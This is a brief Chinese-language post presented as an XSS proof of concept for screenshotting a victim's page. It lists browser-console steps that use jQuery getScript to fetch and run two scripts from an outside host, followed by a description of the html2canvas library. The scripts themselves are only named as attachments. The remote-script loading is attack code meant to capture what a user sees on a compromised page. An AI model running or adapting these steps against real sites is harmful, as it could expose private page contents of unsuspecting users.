XSS截屏-POC

      
  1. F12 - console
  2. $ . getScript ( "http://n1ghtbird.sinaapp.com/printscreen/html2canvas.js" );
  3. $ . getScript ( "http://n1ghtbird.sinaapp.com/printscreen/print.js" );
html2canvas能够实现在用户浏览器端直接对整个或部分页面进行截屏。这个脚本将当前页面渲染成一个canvas图片,通过读取 DOM并将不同的样式应用到这些元素上实现。它不需要来自服务器任何渲染,整张图片都是在客户端浏览器创建。当浏览器不支持Canvas时,将采用 Flashcanvas或ExplorerCanvas技术代替实现。以下浏览器能够很好的支持该脚本:Firefox 3.5+, Google Chrome, Opera新的版本, IE9以上的浏览器。

  html2canvas.js
print.js
见附件: